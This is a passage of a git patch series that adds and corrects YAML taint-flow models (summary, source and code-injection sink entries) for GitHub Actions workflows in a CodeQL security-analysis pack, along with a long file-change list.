From: jorgectf Date: Tue, 16 Apr 2024 21:33:59 +0200 Subject: [PATCH 176/707] Add resuable workflow summaries and sources --- ...dposse_github-action-matrix-outputs-write.model.yml | 6 ++++++ .../element-hq_element-desktop.model.yml | 7 ++++++- .../reusable-workflows/envoyproxy_envoy.model.yml | 7 +++++++ .../hashgraph_hedera-services.model.yml | 7 +++++++ .../reusable-workflows/hashicorp_vault.model.yml | 8 +++++++- .../reusable-workflows/hitobito_hitobito.model.yml | 10 +++++++++- .../reusable-workflows/kubeshop_botkube.model.yml | 7 ++++++- .../reusable-workflows/neondatabase_neon.model.yml | 7 +++++++ .../reusable-workflows/puppeteer_puppeteer.model.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- .../reusable-workflows/tencent_hippy.model.yml | 8 +++++++- .../reusable-workflows/zitadel_zitadel.model.yml | 7 ++++++- 12 files changed, 80 insertions(+), 7 deletions(-) create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml new file mode 100644 index 000000000000..69667ce10b10 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
index 849a531cd7bc..9f7298797233 100644
--- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
@@ -8,4 +8,9 @@ extensions:
 - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"]
 - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"]
 - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"]
- - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml
new file mode 100644
index 000000000000..2a9e2f9fd1ab
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"]
+ - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml
new file mode 100644
index 000000000000..c9c7e8318f7e
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"]
+ - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
index f9b7785cab96..d8be4cc11b91 100644
--- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
@@ -13,4 +13,10 @@ extensions:
 - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"]
 - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"]
 - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"]
- - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"]
\ No newline at end of file
+ - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"]
+ - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
index e263590260ff..e8c98ab4576a 100644
--- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
@@ -4,4 +4,12 @@ extensions:
 extensible: sinkModel
 data:
 - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"]
- - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"]
\ No newline at end of file
+ - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"]
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"]
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_name", "taint", "manual"]
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.project", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
index 50bbdaf8153d..819f9f0e35d8 100644
--- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
@@ -4,4 +4,9 @@ extensions:
 extensible: sinkModel
 data:
 - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"]
- - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"]
\ No newline at end of file
+ - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml
new file mode 100644
index 000000000000..3b8a83bc8c64
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"]
+ - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
new file mode 100644
index 000000000000..0d96077345f5
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
index 74bdcb807c88..0c5427134309 100644
--- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
@@ -3,4 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"]
\ No newline at end of file
+ - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
index 82f5ba4be74d..b5d1263f743f 100644
--- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
@@ -6,4 +6,10 @@ extensions:
 - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"]
 - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
 - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"]
- - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
\ No newline at end of file
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"]
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
index 26f9f659a2d9..f7ee9b66305b 100644
--- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
@@ -6,4 +6,9 @@ extensions:
 - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"]
 - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"]
 - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"]
- - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"]
From 764f6fbc0d691b47b85f361da1f93f642b7d4a59 Mon Sep 17 00:00:00 2001
From: jorgectf Date: Tue, 16 Apr 2024 21:35:30 +0200 Subject: [PATCH 177/707] Fix "inputs" models typo --- ...ctions_actions-runner-controller.model.yml | 18 +++---- .../composite-actions/adap_flower.model.yml | 8 ++-- .../agoric_agoric-sdk.model.yml | 12 ++--- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 4 +- .../amazon-ion_ion-java.model.yml | 4 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 10 ++-- .../ansible_ansible-lint.model.yml | 4 +- .../composite-actions/ansible_awx.model.yml | 4 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 4 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 24 +++++----- .../composite-actions/apache_camel.model.yml | 12 ++--- .../composite-actions/apache_flink.model.yml | 10 ++-- .../composite-actions/apache_nuttx.model.yml | 6 +-- .../apache_opendal.model.yml | 8 ++-- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 14 +++--- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 4 +- .../aptos-labs_aptos-core.model.yml | 6 +-- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 18 +++---- .../auth0_auth0-java.model.yml | 8 ++-- .../auth0_auth0.net.model.yml | 6 +-- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 10 ++-- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 4 +- .../aws_karpenter-provider-aws.model.yml | 4 +- .../awslabs_amazon-eks-ami.model.yml | 14 +++--- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 4 +- 
.../azure_azure-datafactory.model.yml | 4 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 10 ++-- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 6 +-- .../braintree_braintree_android.model.yml | 8 ++-- .../broadinstitute_gatk.model.yml | 6 +-- .../canonical_multipass.model.yml | 4 +- .../chia-network_actions.model.yml | 12 ++--- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 4 +- .../chocobozzz_peertube.model.yml | 4 +- .../cilium_cilium-cli.model.yml | 14 +++--- .../composite-actions/cilium_cilium.model.yml | 6 +-- .../citusdata_citus.model.yml | 6 +-- .../clerk_javascript.model.yml | 10 ++-- .../cloud-custodian_cloud-custodian.model.yml | 8 ++-- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 6 +-- .../conan-io_conan-center-index.model.yml | 4 +- .../corretto_corretto-8.model.yml | 8 ++-- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 20 ++++---- .../composite-actions/d2l-ai_d2l-en.model.yml | 8 ++-- ...build-check-deploy-gradle-action.model.yml | 14 +++--- .../datadog_dd-trace-dotnet.model.yml | 10 ++-- .../datadog_dd-trace-go.model.yml | 8 ++-- .../datadog_dd-trace-js.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../davatorium_rofi.model.yml | 6 +-- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 6 +-- 
.../diggerhq_digger.model.yml | 8 ++-- .../diku-dk_futhark.model.yml | 4 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 6 +-- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 8 ++-- .../eksctl-io_eksctl.model.yml | 6 +-- .../elastic_apm-agent-dotnet.model.yml | 4 +- .../elastic_apm-agent-java.model.yml | 10 ++-- .../elementor_elementor.model.yml | 16 +++---- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 6 +-- .../eonasdan_tempus-dominus.model.yml | 4 +- .../composite-actions/erlang_otp.model.yml | 4 +- .../esphome_esphome.model.yml | 6 +-- .../composite-actions/expensify_app.model.yml | 18 +++---- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 6 +-- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 4 +- .../facebookresearch_xformers.model.yml | 10 ++-- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 8 ++-- .../firebase_firebase-ios-sdk.model.yml | 8 ++-- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 10 ++-- .../composite-actions/fluxcd_flux2.model.yml | 6 +-- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 4 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 6 +-- .../composite-actions/gaphor_gaphor.model.yml | 4 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 10 ++-- .../composite-actions/github_ruby.model.yml | 10 ++-- .../gittools_gitversion.model.yml | 6 +-- .../go-spatial_tegola.model.yml | 4 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 8 ++-- 
.../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 10 ++-- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 10 ++-- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 6 +-- .../homebrew_actions.model.yml | 18 +++---- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 6 +-- .../igniterealtime_openfire.model.yml | 6 +-- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 26 +++++----- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 22 ++++----- .../ionic-team_ionicons.model.yml | 18 +++---- .../ionic-team_stencil.model.yml | 12 ++--- .../composite-actions/ipfs_aegir.model.yml | 8 ++-- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 34 ++++++------- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 14 +++--- .../jupyter_docker-stacks.model.yml | 6 +-- .../keycloak_keycloak.model.yml | 6 +-- .../composite-actions/kserve_kserve.model.yml | 6 +-- .../kubeflow_katib.model.yml | 10 ++-- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 4 +- .../kubeshop_botkube.model.yml | 4 +- .../kyverno_kyverno.model.yml | 6 +-- .../composite-actions/lancedb_lance.model.yml | 8 ++-- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 12 ++--- .../ldc-developers_ldc.model.yml | 20 ++++---- .../ledgerhq_ledger-live.model.yml | 6 +-- .../composite-actions/lerna_lerna.model.yml | 2 +- 
.../composite-actions/lf-edge_eve.model.yml | 6 +-- .../libgit2_libgit2.model.yml | 14 +++--- .../lightning-ai_pytorch-lightning.model.yml | 16 +++---- .../lightning-ai_torchmetrics.model.yml | 6 +-- .../linkerd_linkerd2.model.yml | 8 ++-- .../logseq_publish-spa.model.yml | 8 ++-- .../macvim-dev_macvim.model.yml | 4 +- .../mamba-org_mamba.model.yml | 6 +-- .../maplibre_maplibre-native.model.yml | 22 ++++----- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 6 +-- .../mdanalysis_mdanalysis.model.yml | 16 +++---- .../medic_cht-core.model.yml | 6 +-- .../medusajs_medusa.model.yml | 6 +-- .../metabase_metabase.model.yml | 24 +++++----- ...etamask_action-create-release-pr.model.yml | 6 +-- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 12 ++--- .../composite-actions/microsoft_wsl.model.yml | 4 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 6 +-- .../mozilla_addons-server.model.yml | 4 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 6 +-- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 6 +-- ..._optic-release-automation-action.model.yml | 6 +-- .../composite-actions/nektos_act.model.yml | 14 +++--- ...4j-contrib_neo4j-apoc-procedures.model.yml | 4 +- .../neondatabase_neon.model.yml | 16 +++---- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 4 +- .../composite-actions/novuhq_novu.model.yml | 2 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 28 +++++------ .../composite-actions/ocaml_dune.model.yml | 10 ++-- .../oneflow-inc_oneflow.model.yml | 14 +++--- ...metry_opentelemetry-ruby-contrib.model.yml | 6 +-- 
...pen-telemetry_opentelemetry-ruby.model.yml | 4 +- .../open-watcom_open-watcom-v2.model.yml | 6 +-- .../openapitools_openapi-generator.model.yml | 6 +-- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 6 +-- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 14 +++--- .../openvinotoolkit_openvino.model.yml | 22 ++++----- ...enzeppelin-contracts-upgradeable.model.yml | 14 +++--- ...nzeppelin_openzeppelin-contracts.model.yml | 14 +++--- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 4 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 4 +- .../owntracks_android.model.yml | 4 +- .../pandas-dev_pandas.model.yml | 6 +-- .../pardeike_harmony.model.yml | 8 ++-- .../pennylaneai_pennylane.model.yml | 4 +- .../phalcon_cphalcon.model.yml | 16 +++---- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 10 ++-- .../phpdocumentor_phpdocumentor.model.yml | 4 +- ...necone-io_pinecone-python-client.model.yml | 10 ++-- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 4 +- .../composite-actions/primer_react.model.yml | 4 +- .../project-chip_connectedhomeip.model.yml | 6 +-- .../projectnessie_nessie.model.yml | 8 ++-- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 6 +-- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 4 +- .../quarto-dev_quarto-cli.model.yml | 20 ++++---- .../composite-actions/quay_clair.model.yml | 12 ++--- .../quickwit-oss_quickwit.model.yml | 4 +- .../composite-actions/r-lib_actions.model.yml | 26 +++++----- .../randombit_botan.model.yml | 4 +- .../raspberrypi_documentation.model.yml | 14 +++--- .../ray-project_kuberay.model.yml | 2 +- 
.../readthedocs_actions.model.yml | 10 ++-- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 8 ++-- .../composite-actions/risc0_risc0.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 8 ++-- .../composite-actions/rook_rook.model.yml | 8 ++-- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 10 ++-- .../composite-actions/rusefi_rusefi.model.yml | 10 ++-- .../saltstack_salt.model.yml | 18 +++---- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 4 +- .../composite-actions/scitools_iris.model.yml | 6 +-- .../scylladb_scylla-operator.model.yml | 8 ++-- .../shader-slang_slang.model.yml | 10 ++-- .../shaka-project_shaka-player.model.yml | 8 ++-- ...ode_react-webpack-rails-tutorial.model.yml | 4 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 4 +- .../solidusio_solidus.model.yml | 8 ++-- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 14 +++--- .../sonic-pi-net_sonic-pi.model.yml | 6 +-- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 4 +- .../spring-io_start.spring.io.model.yml | 4 +- .../spring-projects_spring-boot.model.yml | 4 +- ...spring-projects_spring-framework.model.yml | 4 +- .../spring-projects_spring-graphql.model.yml | 4 +- .../square_workflow-kotlin.model.yml | 6 +-- .../stefanprodan_podinfo.model.yml | 4 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 2 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 12 ++--- .../swagger-api_swagger-parser.model.yml | 12 ++--- .../tarantool_tarantool.model.yml | 8 ++-- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 4 +- 
.../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 16 +++---- .../treeverse_lakefs.model.yml | 6 +-- .../trezor_trezor-firmware.model.yml | 8 ++-- .../tribler_tribler.model.yml | 10 ++-- .../trunk-io_trunk-action.model.yml | 16 +++---- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 14 +++--- .../composite-actions/vkcom_vkui.model.yml | 12 ++--- .../vuetifyjs_vuetify.model.yml | 8 ++-- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 16 +++---- .../composite-actions/wazuh_wazuh.model.yml | 6 +-- .../web-infra-dev_rspack.model.yml | 6 +-- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 6 +-- .../composite-actions/zcash_zcash.model.yml | 4 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 4 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 8 ++-- .../actions_reusable-workflows.model.yml | 12 ++--- .../reusable-workflows/adap_flower.model.yml | 6 +-- .../aio-libs_multidict.model.yml | 4 +- .../aio-libs_yarl.model.yml | 4 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 20 ++++---- .../reusable-workflows/apache_flink.model.yml | 4 +- .../reusable-workflows/apache_spark.model.yml | 4 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 6 +-- .../argoproj_argo-rollouts.model.yml | 6 +-- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 16 +++---- .../bbq-beets_avocaddo-cmw.model.yml | 8 ++-- .../bbq-beets_mobile-ci-cd.model.yml | 8 
